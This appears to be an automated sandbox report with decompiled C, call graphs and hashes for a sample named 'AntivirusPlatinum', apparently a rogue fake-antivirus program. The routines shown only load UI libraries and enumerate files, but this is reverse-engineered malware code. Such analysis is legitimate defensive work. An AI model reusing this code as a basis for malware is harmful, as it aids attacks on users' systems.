410ce5 11636 40fc8d 54 API calls 11635->11636 11636->11637 11637->11633 11639 403952 32 API calls 11637->11639 11640 410d01 11638->11640 11645 410d20 11639->11645 11640->11633 11642 40fc8d 54 API calls 11640->11642 11641 410d41 11644 4102ca 36 API calls 11641->11644 11642->11637 11643 40fc8d 54 API calls 11643->11645 11646 410d4e 11644->11646 11645->11641 11645->11643 11647 410d61 11645->11647 11646->11633 11648 40a205 ctype 2 API calls 11646->11648 11647->11633 11649 40a205 ctype 2 API calls 11647->11649 11648->11633 11649->11633 11652 410276 11650->11652 11651 4102bc 11651->11591 11652->11651 11653 40ff05 54 API calls 11652->11653 11653->11651 11655 40e546 2 API calls 11654->11655 11656 40f9f2 11655->11656 11657 40e55a 34 API calls 11656->11657 11658 40f9fb 11657->11658 11658->11580 11660 40609f 2 API calls 11659->11660 11661 4102dd 11660->11661 11698 407afc 11661->11698 11663 41030c 11665 41032b 11663->11665 11668 41018e 2 API calls 11663->11668 11664 4105ec 11712 4060b4 11664->11712 11665->11664 11666 40a668 2 API calls 11665->11666 11670 41036b 11666->11670 11668->11665 11669 4105f4 11669->11602 11669->11603 11670->11664 11671 40eb33 34 API calls 11670->11671 11672 4103e6 11670->11672 11673 41039d 11671->11673 11674 40eb33 34 API calls 11672->11674 11679 41045c ctype 11672->11679 11675 40a668 2 API calls 11673->11675 11674->11679 11676 4103a4 11675->11676 11677 40eb33 34 API calls 11676->11677 11677->11672 11678 4105e0 11680 410628 11678->11680 11681 401313 34 API calls 11678->11681 11679->11664 11679->11678 11684 403952 32 API calls 11679->11684 11682 40dbcb 2 API calls 11680->11682 11695 41064e ctype 11680->11695 11681->11680 11683 410645 11682->11683 11685 401313 34 API calls 11683->11685 11689 41058f 11684->11689 11685->11695 11686 4105c3 11702 408974 11686->11702 11687 4105e2 11687->11664 11691 40a205 ctype 2 API calls 11687->11691 11689->11686 11689->11687 11691->11664 11692 40a205 ctype 2 API calls 11692->11678 11693 410739 11694 4060b4 2 API calls 11693->11694 11694->11669 11695->11664 11695->11693 11696 401313 34 API calls 11695->11696 11697 410700 11695->11697 11696->11697 11697->11664 11697->11693 11699 407b0f 11698->11699 11700 407b05 11698->11700 11699->11663 11701 40a668 2 API calls 11700->11701 11701->11699 11705 40898f 11702->11705 11703 408b9d 11704 407cf7 34 API calls 11703->11704 11707 408ba6 11704->11707 11705->11703 11710 4089ea 11705->11710 11715 407cf7 11705->11715 11707->11678 11707->11692 11708 407cf7 34 API calls 11711 408a8e 11708->11711 11709 401313 34 API calls 11709->11710 11710->11703 11710->11709 11710->11711 11711->11703 11711->11708 11713 40a65b ctype 2 API calls 11712->11713 11714 4060bc 11713->11714 11714->11669 11716 407d0b 11715->11716 11717 407d38 11715->11717 11718 40a224 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapReAlloc 11716->11718 11717->11710 11719 407d28 11718->11719 11719->11717 11720 403443 30 API calls 11719->11720 11720->11717 11722 40fb63 11721->11722 11723 40fb9e 11721->11723 11722->11723 11724 40fb6c 11722->11724 11725 40e9d5 38 API calls 11723->11725 11730 40e9d5 11724->11730 11726 40fb95 11725->11726 11726->11612 11729 40e9d5 38 API calls 11729->11726 11731 40e9f5 11730->11731 11733 40ea1f 11730->11733 11732 409210 38 API calls 11731->11732 11731->11733 11732->11733 11733->11729 11748 40fab8 11734->11748 11737 40fab8 54 API calls 11738 40fc11 11737->11738 11740 40fab8 54 API calls 11738->11740 11741 40fc21 11738->11741 11747 40fc5a 11738->11747 11740->11741 11752 40fbb6 11741->11752 11743 40fc55 11756 40e546 11743->11756 11744 40fc69 11760 40e55a 11744->11760 11747->11629 11749 40fac3 11748->11749 11750 40fac8 11748->11750 11751 40e95b 54 API calls 11749->11751 11750->11737 11750->11738 11751->11750 11753 40fbcf 11752->11753 11754 40fab8 54 API calls 11753->11754 11755 40fbe5 11753->11755 11754->11753 11755->11743 11755->11744 11755->11747 11757 40e559 11756->11757 11758 40e54b 11756->11758 11757->11747 11759 40a205 ctype 2 API calls 11758->11759 11759->11757 11761 40e56d 11760->11761 11767 40e569 11760->11767 11762 40e546 2 API calls 11761->11762 11763 40e573 11762->11763 11768 40a1ec GetProcessHeap RtlAllocateHeap 11763->11768 11765 40e589 11766 403443 30 API calls 11765->11766 11765->11767 11766->11767 11767->11747 11768->11765 11770 40fca1 11769->11770 11772 40fcc6 11769->11772 11771 40fab8 54 API calls 11770->11771 11770->11772 11774 40fd01 11770->11774 11771->11770 11772->11633 11772->11634 11772->11635 11773 40fab8 54 API calls 11773->11774 11774->11772 11774->11773 11775->10950 11776->10955 11777->10958 11779 40aca1 3 API calls 11778->11779 11780 40ad2e 11779->11780 11781 40ad3a 11780->11781 11782 40ace4 3 API calls 11780->11782 11781->10281 11781->10282 11782->11781 11783->10285 11785 40ad13 11784->11785 11786 40aced GetDC 11784->11786 11785->10291 11786->11785 11787 40acfc GetDeviceCaps ReleaseDC 11786->11787 11787->11785 11789 40acd0 11788->11789 11790 40acaa GetDC 11788->11790 11789->10291 11790->11789 11791 40acb9 GetDeviceCaps ReleaseDC 11790->11791 11791->11789 11793 40ac23 11792->11793 11794 40ac26 9 API calls 11792->11794 11793->11794 11794->10294 11796 4051ac 22 API calls 11795->11796 11797 401894 11796->11797 11798 401357 47 API calls 11797->11798 11799 401898 11797->11799 11800 4018a5 11798->11800 11806 4018cb 11799->11806 11800->11799 11801 4098f7 3 API calls 11800->11801 11802 4018b0 11801->11802 11803 40b2a9 15 API calls 11802->11803 11804 4018ba 11803->11804 11805 404f2e 30 API calls 11804->11805 11805->11799 11807 4018e4 11806->11807 11827 4018dd 11806->11827 11808 40a7e9 31 API calls 11807->11808 11809 4018ee 11808->11809 11810 40197f 11809->11810 11811 4018ff 11809->11811 11813 4054ed 32 API calls 11810->11813 11812 4054ed 32 API calls 11811->11812 11814 401910 11812->11814 11815 401998 11813->11815 11816 401ce5 47 API calls 11814->11816 11837 402790 11815->11837 11818 401917 11816->11818 11820 401921 OemToCharBuffA 11818->11820 11821 40196c 11818->11821 11820->11821 11824 401934 11820->11824 11823 40a810 32 API calls 11821->11823 11822 4019b5 11826 40a810 32 API calls 11822->11826 11823->11827 11870 4016bf 11824->11870 11826->11827 11827->10315 11827->10319 11832 40e144 MultiByteToWideChar 11833 401955 11832->11833 11834 401708 34 API calls 11833->11834 11835 40195d 11834->11835 11836 4016bf 34 API calls 11835->11836 11836->11821 11839 402796 11837->11839 11838 401ce5 47 API calls 11838->11839 11839->11838 11840 401264 32 API calls 11839->11840 11841 4019a4 11839->11841 11840->11839 11841->11822 11842 401722 11841->11842 11843 402511 59 API calls 11842->11843 11844 40173e 11843->11844 11845 401742 11844->11845 11846 401751 11844->11846 11847 4017c6 11844->11847 11845->11822 11877 401278 11846->11877 11847->11845 11850 4016a4 34 API calls 11847->11850 11849 40175f 11853 401708 34 API calls 11849->11853 11851 4017d6 11850->11851 11852 4016bf 34 API calls 11851->11852 11854 4017e1 11852->11854 11855 40177f 11853->11855 11856 40e144 MultiByteToWideChar 11854->11856 11858 40e115 WideCharToMultiByte 11855->11858 11857 4017ee 11856->11857 11859 401708 34 API calls 11857->11859 11860 401788 11858->11860 11861 4017f6 11859->11861 11862 401708 34 API calls 11860->11862 11864 4016bf 34 API calls 11861->11864 11863 40179f 11862->11863 11865 4017ba 11863->11865 11882 4016d9 11863->11882 11864->11845 11865->11845 11868 40a205 ctype 2 API calls 11865->11868 11867 4017b1 11869 4016bf 34 API calls 11867->11869 11868->11845 11869->11865 11871 4016d1 11870->11871 11872 4016c8 11870->11872 11874 4016a4 11871->11874 11873 4012b7 34 API calls 11872->11873 11873->11871 11875 401313 34 API calls 11874->11875 11876 4016ae 11875->11876 11876->11832 11887 40a1ec GetProcessHeap RtlAllocateHeap 11877->11887 11879 401289 11880 40129d 11879->11880 11881 403443 30 API calls 11879->11881 11880->11849 11881->11880 11883 40dbcb 2 API calls 11882->11883 11884 4016e2 11883->11884 11885 4016bf 34 API calls 11884->11885 11886 4016f0 11885->11886 11886->11867 11887->11879 11888->10336 11890 4066d8 11889->11890 11891 40672d VariantInit 11890->11891 11893 4066f1 PeekMessageA 11890->11893 11892 40675d 11891->11892 11892->10343 11894 406703 TranslateMessage DispatchMessageA GetMessageA 11893->11894 11895 406724 GetTickCount 11893->11895 11894->11895 11895->11890 11896->10349 11898 4065f8 11897->11898 11909 40a1ec GetProcessHeap RtlAllocateHeap 11898->11909 11900 4066ac 11900->10350 11901 40a205 ctype 2 API calls 11901->11900 11902 406606 11902->11900 11902->11901 11904 406a28 11903->11904 11910 40a1ec GetProcessHeap RtlAllocateHeap 11904->11910 11906 406b4a 11906->10354 11907 40a5bd CompareStringA 11908 406a2f 11907->11908 11908->11906 11908->11907 11909->11902 11910->11908 12085 40cb2b 12086 40309d 15 API calls 12085->12086 12087 40cb4b 12086->12087 12088 40cb83 SendMessageA 12087->12088 12089 40cb8e 12087->12089 12093 40cb55 12087->12093 12088->12089 12091 40cba7 12089->12091 12092 40cb97 SendDlgItemMessageA 12089->12092 12090 40cb66 12095 40ba36 28 API calls 12091->12095 12092->12091 12093->12090 12094 40cc14 EndDialog 12093->12094 12094->12090 12096 40cbad GetDlgItem SendMessageA GetSysColor SendMessageA 12095->12096 12097 40bf99 43 API calls 12096->12097 12098 40cbe8 12097->12098 12098->12093 12099 40cbf2 12098->12099 12100 406d54 29 API calls 12099->12100 12101 40cc05 12100->12101 12102 40a205 ctype 2 API calls 12101->12102 12103 40cc10 12102->12103 12103->12090

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 763 411585-4115cd LoadLibraryA * 2 #17 LoadLibraryA 764 4115ec-4115fc SHGetMalloc 763->764 765 4115cf-4115dd GetProcAddress 763->765 766 4115e5-4115e6 FreeLibrary 765->766 767 4115df-4115e2 765->767 766->764 767->766
                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                  			E00411585(signed int* __ecx) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				struct HINSTANCE__* _t7;
                                                                                                                                                  				_Unknown_base(*)()* _t11;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				struct HINSTANCE__* _t18;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				struct HINSTANCE__** _t21;
                                                                                                                                                  
                                                                                                                                                  				_t21 = __ecx;
                                                                                                                                                  				__ecx[1] = __ecx[1] & 0x00000000;
                                                                                                                                                  				 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                  				_t7 = LoadLibraryA("riched32.dll"); // executed
                                                                                                                                                  				 *_t21 = _t7;
                                                                                                                                                  				_t21[1] = LoadLibraryA("riched20.dll");
                                                                                                                                                  				__imp__#17(_t16, _t20, __ecx, __ecx);
                                                                                                                                                  				_v12 = 8;
                                                                                                                                                  				_v8 = 0x7ff;
                                                                                                                                                  				_t18 = LoadLibraryA("COMCTL32.DLL");
                                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                                  					_t11 = GetProcAddress(_t18, "InitCommonControlsEx");
                                                                                                                                                  					if(_t11 != 0) {
                                                                                                                                                  						 *_t11( &_v12);
                                                                                                                                                  					}
                                                                                                                                                  					FreeLibrary(_t18);
                                                                                                                                                  				}
                                                                                                                                                  				__imp__SHGetMalloc(0x41fff0); // executed
                                                                                                                                                  				return _t21;
                                                                                                                                                  			}











                                                                                                                                                  0x00411592
                                                                                                                                                  0x00411594
                                                                                                                                                  0x00411598
                                                                                                                                                  0x004115a0
                                                                                                                                                  0x004115a7
                                                                                                                                                  0x004115ab
                                                                                                                                                  0x004115ae
                                                                                                                                                  0x004115b9
                                                                                                                                                  0x004115c0
                                                                                                                                                  0x004115c9
                                                                                                                                                  0x004115cd
                                                                                                                                                  0x004115d5
                                                                                                                                                  0x004115dd
                                                                                                                                                  0x004115e3
                                                                                                                                                  0x004115e3
                                                                                                                                                  0x004115e6
                                                                                                                                                  0x004115e6
                                                                                                                                                  0x004115f1
                                                                                                                                                  0x004115fc

                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNELBASE(riched32.dll,00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,?,?,?,0040D3EE), ref: 004115A0
                                                                                                                                                  • LoadLibraryA.KERNEL32(riched20.dll,?,0040D3EE), ref: 004115A9
                                                                                                                                                  • #17.COMCTL32(?,0040D3EE), ref: 004115AE
                                                                                                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,0040D3EE), ref: 004115C7
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004115D5
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,0040D3EE), ref: 004115E6
                                                                                                                                                  • SHGetMalloc.SHELL32(0041FFF0), ref: 004115F1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$Load$AddressFreeMallocProc
                                                                                                                                                  • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$COMCTL32.DLL$InitCommonControlsEx$riched20.dll$riched32.dll
                                                                                                                                                  • API String ID: 253899923-2216621614
                                                                                                                                                  • Opcode ID: e3c62c2280fe2742b857e97263135e7d095fb7be557769444439f8313c917933
                                                                                                                                                  • Instruction ID: 315302b8a226ed3062516fc9a18bbbd533a07d3aa027722884380aaa5de4aa0e
                                                                                                                                                  • Opcode Fuzzy Hash: e3c62c2280fe2742b857e97263135e7d095fb7be557769444439f8313c917933
                                                                                                                                                  • Instruction Fuzzy Hash: 3DF08671600304BBD710ABA5CD09BEAFBE8EF84711F21812EE151D3190DBF8D490CB28
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 859 405c10-405c2a call 406ea5 862 405c30-405c35 859->862 863 405dec-405df1 859->863 864 405c37-405c3b 862->864 865 405c4c-405c57 call 40e144 862->865 866 405df3-405df6 863->866 867 405e07-405e12 call 40e115 863->867 864->865 869 405c3d-405c4a call 40e338 864->869 874 405c5c-405c6c 865->874 866->867 871 405df8-405e05 call 40a477 866->871 872 405e17-405e27 867->872 869->874 871->872 877 405e29-405e3b FindFirstFileA 872->877 878 405e5f-405e6a FindNextFileA 872->878 880 405ca2-405cad FindNextFileW 874->880 881 405c6e-405c80 FindFirstFileW 874->881 884 405e8a-405f92 call 40a477 call 4073db call 40a477 call 40e144 call 401030 call 40a477 call 40df79 * 3 call 40ded1 call 40dadd 877->884 885 405e3d-405e46 877->885 888 405e81-405e84 878->888 889 405e6c-405e7b 878->889 882 405cc4-405cc7 880->882 883 405caf-405cbe 880->883 886 405c82-405c8b 881->886 887 405ccd-405ddc call 40e338 call 407432 call 40e338 call 40e115 call 401030 call 40e115 call 40df79 * 3 call 40ded1 call 40dafb 881->887 882->887 890 405f99-405faa 882->890 883->882 884->890 946 405f94-405f96 884->946 901 405e52 885->901 902 405e48 885->902 886->901 903 405c91-405c94 886->903 887->890 947 405de2-405de7 887->947 888->884 888->890 889->888 907 405e54-405e5a 901->907 906 405e4b 902->906 903->901 908 405c9a-405c9d 903->908 906->901 911 405e4d-405e50 906->911 907->890 908->906 911->907 946->890 947->890
                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E00405C10(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				char* _t98;
                                                                                                                                                  				void* _t134;
                                                                                                                                                  				char _t136;
                                                                                                                                                  				short* _t140;
                                                                                                                                                  				intOrPtr _t169;
                                                                                                                                                  				void* _t175;
                                                                                                                                                  				long _t176;
                                                                                                                                                  				signed int _t179;
                                                                                                                                                  				void* _t180;
                                                                                                                                                  				short* _t182;
                                                                                                                                                  				void* _t183;
                                                                                                                                                  				void* _t186;
                                                                                                                                                  				intOrPtr _t197;
                                                                                                                                                  				short* _t204;
                                                                                                                                                  				intOrPtr _t206;
                                                                                                                                                  				void* _t208;
                                                                                                                                                  				void* _t210;
                                                                                                                                                  				void* _t221;
                                                                                                                                                  
                                                                                                                                                  				_t197 = __edx;
                                                                                                                                                  				_t186 = __ecx;
                                                                                                                                                  				_t208 = _t210 - 0x68;
                                                                                                                                                  				_push(_t179);
                                                                                                                                                  				if(E00406EA5() == 0) {
                                                                                                                                                  					_t98 =  *((intOrPtr*)(_t208 + 0x74));
                                                                                                                                                  					if(_t98 == 0 ||  *_t98 == 0) {
                                                                                                                                                  						E0040E115(_t186,  *((intOrPtr*)(_t208 + 0x78)), _t208 - 0x5e8, 0x1000000);
                                                                                                                                                  					} else {
                                                                                                                                                  						E0040A477(_t208 - 0x5e8, _t98);
                                                                                                                                                  					}
                                                                                                                                                  					_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                  					_t180 = _t179 | 0xffffffff;
                                                                                                                                                  					_push(_t208 - 0xd8);
                                                                                                                                                  					if( *(_t208 + 0x70) != _t180) {
                                                                                                                                                  						if(FindNextFileA( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                  							 *(_t208 + 0x70) = _t180;
                                                                                                                                                  							 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t131 != 0x00000012;
                                                                                                                                                  						}
                                                                                                                                                  						if( *(_t208 + 0x70) == _t180) {
                                                                                                                                                  							goto L32;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L30;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t134 = FindFirstFileA(_t208 - 0x5e8, ??);
                                                                                                                                                  						 *(_t208 + 0x70) = _t134;
                                                                                                                                                  						if(_t134 != _t180) {
                                                                                                                                                  							L30:
                                                                                                                                                  							E0040A477(_t206, _t208 - 0x5e8);
                                                                                                                                                  							E0040A477(E004073DB(_t206), _t208 - 0xac);
                                                                                                                                                  							_t182 = _t206 + 0x400;
                                                                                                                                                  							E0040E144(_t206, _t182, 0x1000000);
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0xbc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0xb8));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0xd8));
                                                                                                                                                  							asm("adc edx, edi");
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                  							E0040A477(_t206 + 0xc80, _t208 + 0x58);
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0xd4));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0xd0));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0xcc));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0xc8));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0xc4));
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0xc0));
                                                                                                                                                  							E0040DF79(_t182, _t206 + 0xc14, _t208 - 0xc4);
                                                                                                                                                  							E0040DF79(_t182, _t206 + 0xc38, _t208 - 0xd4);
                                                                                                                                                  							E0040DF79(_t182, _t206 + 0xc5c, _t208 - 0xcc);
                                                                                                                                                  							 *((intOrPtr*)(_t206 + 0xc0c)) = E0040DED1(_t206 + 0xc14);
                                                                                                                                                  							if(E0040DADD(_t206) != 0) {
                                                                                                                                                  								 *_t182 = 0;
                                                                                                                                                  							}
                                                                                                                                                  							L32:
                                                                                                                                                  							 *(_t206 + 0x1098) =  *(_t206 + 0x1098) & 0x00000000;
                                                                                                                                                  							return  *(_t208 + 0x70);
                                                                                                                                                  						}
                                                                                                                                                  						if(GetLastError() == 2) {
                                                                                                                                                  							L25:
                                                                                                                                                  							_t136 = 0;
                                                                                                                                                  							L26:
                                                                                                                                                  							 *((char*)(_t206 + 0x109c)) = _t136;
                                                                                                                                                  							goto L32;
                                                                                                                                                  						}
                                                                                                                                                  						L23:
                                                                                                                                                  						if(_t221 == 0) {
                                                                                                                                                  							goto L25;
                                                                                                                                                  						}
                                                                                                                                                  						_t136 = 1;
                                                                                                                                                  						goto L26;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t140 =  *((intOrPtr*)(_t208 + 0x78));
                                                                                                                                                  				if(_t140 == 0 ||  *_t140 == 0) {
                                                                                                                                                  					E0040E144( *((intOrPtr*)(_t208 + 0x74)), _t208 - 0x9e8, 0x1000000);
                                                                                                                                                  				} else {
                                                                                                                                                  					E0040E338(_t208 - 0x9e8, _t140);
                                                                                                                                                  				}
                                                                                                                                                  				_t206 =  *((intOrPtr*)(_t208 + 0x7c));
                                                                                                                                                  				_t183 = _t179 | 0xffffffff;
                                                                                                                                                  				_push(_t208 - 0x1e8);
                                                                                                                                                  				if( *(_t208 + 0x70) != _t183) {
                                                                                                                                                  					if(FindNextFileW( *(_t208 + 0x70), ??) == 0) {
                                                                                                                                                  						 *(_t208 + 0x70) = _t183;
                                                                                                                                                  						 *((char*)(_t206 + 0x109c)) = GetLastError() & 0xffffff00 | _t172 != 0x00000012;
                                                                                                                                                  					}
                                                                                                                                                  					if( *(_t208 + 0x70) == _t183) {
                                                                                                                                                  						goto L32;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L13;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t175 = FindFirstFileW(_t208 - 0x9e8, ??); // executed
                                                                                                                                                  					 *(_t208 + 0x70) = _t175;
                                                                                                                                                  					if(_t175 != _t183) {
                                                                                                                                                  						L13:
                                                                                                                                                  						E0040E338(_t206 + 0x400, _t208 - 0x9e8);
                                                                                                                                                  						E0040E338(E00407432(_t206 + 0x400), _t208 - 0x1bc);
                                                                                                                                                  						E0040E115(_t186, _t206 + 0x400, _t206, 0x1000000);
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0xc00)) = E00401030( *((intOrPtr*)(_t208 - 0x1cc)), 0, 0, 1) +  *((intOrPtr*)(_t208 - 0x1c8));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0xc08)) =  *((intOrPtr*)(_t208 - 0x1e8));
                                                                                                                                                  						asm("adc edx, ebx");
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0xc04)) = _t197;
                                                                                                                                                  						E0040E115( *((intOrPtr*)(_t208 - 0x1c8)), _t208 + 0x4c, _t206 + 0xc80, 0x1000000);
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1080)) =  *((intOrPtr*)(_t208 - 0x1e4));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1084)) =  *((intOrPtr*)(_t208 - 0x1e0));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1088)) =  *((intOrPtr*)(_t208 - 0x1dc));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x108c)) =  *((intOrPtr*)(_t208 - 0x1d8));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1090)) =  *((intOrPtr*)(_t208 - 0x1d4));
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0x1094)) =  *((intOrPtr*)(_t208 - 0x1d0));
                                                                                                                                                  						E0040DF79(0, _t206 + 0xc14, _t208 - 0x1d4);
                                                                                                                                                  						E0040DF79(0, _t206 + 0xc38, _t208 - 0x1e4);
                                                                                                                                                  						E0040DF79(0, _t206 + 0xc5c, _t208 - 0x1dc);
                                                                                                                                                  						_t169 = E0040DED1(_t206 + 0xc14);
                                                                                                                                                  						_t204 = _t206 + 0x400;
                                                                                                                                                  						 *((intOrPtr*)(_t206 + 0xc0c)) = _t169;
                                                                                                                                                  						if(E0040DAFB(_t204) != 0) {
                                                                                                                                                  							 *_t204 = 0;
                                                                                                                                                  						}
                                                                                                                                                  						goto L32;
                                                                                                                                                  					}
                                                                                                                                                  					_t176 = GetLastError();
                                                                                                                                                  					if(_t176 == 2 || _t176 == 3) {
                                                                                                                                                  						goto L25;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t221 = _t176 - 0x12;
                                                                                                                                                  						goto L23;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}






















                                                                                                                                                  0x00405c10
                                                                                                                                                  0x00405c10
                                                                                                                                                  0x00405c11
                                                                                                                                                  0x00405c1b
                                                                                                                                                  0x00405c2a
                                                                                                                                                  0x00405dec
                                                                                                                                                  0x00405df1
                                                                                                                                                  0x00405e12
                                                                                                                                                  0x00405df8
                                                                                                                                                  0x00405e00
                                                                                                                                                  0x00405e00
                                                                                                                                                  0x00405e17
                                                                                                                                                  0x00405e1a
                                                                                                                                                  0x00405e23
                                                                                                                                                  0x00405e27
                                                                                                                                                  0x00405e6a
                                                                                                                                                  0x00405e6c
                                                                                                                                                  0x00405e7b
                                                                                                                                                  0x00405e7b
                                                                                                                                                  0x00405e84
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e29
                                                                                                                                                  0x00405e30
                                                                                                                                                  0x00405e36
                                                                                                                                                  0x00405e3b
                                                                                                                                                  0x00405e8a
                                                                                                                                                  0x00405e92
                                                                                                                                                  0x00405ea5
                                                                                                                                                  0x00405eab
                                                                                                                                                  0x00405eb3
                                                                                                                                                  0x00405ed3
                                                                                                                                                  0x00405edf
                                                                                                                                                  0x00405eef
                                                                                                                                                  0x00405ef2
                                                                                                                                                  0x00405ef8
                                                                                                                                                  0x00405f03
                                                                                                                                                  0x00405f0f
                                                                                                                                                  0x00405f1b
                                                                                                                                                  0x00405f27
                                                                                                                                                  0x00405f33
                                                                                                                                                  0x00405f3f
                                                                                                                                                  0x00405f54
                                                                                                                                                  0x00405f66
                                                                                                                                                  0x00405f78
                                                                                                                                                  0x00405f85
                                                                                                                                                  0x00405f92
                                                                                                                                                  0x00405f96
                                                                                                                                                  0x00405f96
                                                                                                                                                  0x00405f99
                                                                                                                                                  0x00405f99
                                                                                                                                                  0x00405faa
                                                                                                                                                  0x00405faa
                                                                                                                                                  0x00405e46
                                                                                                                                                  0x00405e52
                                                                                                                                                  0x00405e52
                                                                                                                                                  0x00405e54
                                                                                                                                                  0x00405e54
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e54
                                                                                                                                                  0x00405e4b
                                                                                                                                                  0x00405e4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e4f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e4f
                                                                                                                                                  0x00405e27
                                                                                                                                                  0x00405c30
                                                                                                                                                  0x00405c35
                                                                                                                                                  0x00405c57
                                                                                                                                                  0x00405c3d
                                                                                                                                                  0x00405c45
                                                                                                                                                  0x00405c45
                                                                                                                                                  0x00405c5c
                                                                                                                                                  0x00405c5f
                                                                                                                                                  0x00405c68
                                                                                                                                                  0x00405c6c
                                                                                                                                                  0x00405cad
                                                                                                                                                  0x00405caf
                                                                                                                                                  0x00405cbe
                                                                                                                                                  0x00405cbe
                                                                                                                                                  0x00405cc7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405c6e
                                                                                                                                                  0x00405c75
                                                                                                                                                  0x00405c7b
                                                                                                                                                  0x00405c80
                                                                                                                                                  0x00405ccd
                                                                                                                                                  0x00405cdb
                                                                                                                                                  0x00405cee
                                                                                                                                                  0x00405cf6
                                                                                                                                                  0x00405d16
                                                                                                                                                  0x00405d22
                                                                                                                                                  0x00405d33
                                                                                                                                                  0x00405d36
                                                                                                                                                  0x00405d3c
                                                                                                                                                  0x00405d47
                                                                                                                                                  0x00405d53
                                                                                                                                                  0x00405d5f
                                                                                                                                                  0x00405d6b
                                                                                                                                                  0x00405d77
                                                                                                                                                  0x00405d83
                                                                                                                                                  0x00405d98
                                                                                                                                                  0x00405daa
                                                                                                                                                  0x00405dbc
                                                                                                                                                  0x00405dc3
                                                                                                                                                  0x00405dc8
                                                                                                                                                  0x00405dcf
                                                                                                                                                  0x00405ddc
                                                                                                                                                  0x00405de4
                                                                                                                                                  0x00405de4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405ddc
                                                                                                                                                  0x00405c82
                                                                                                                                                  0x00405c8b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405c9a
                                                                                                                                                  0x00405c9a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405c9a
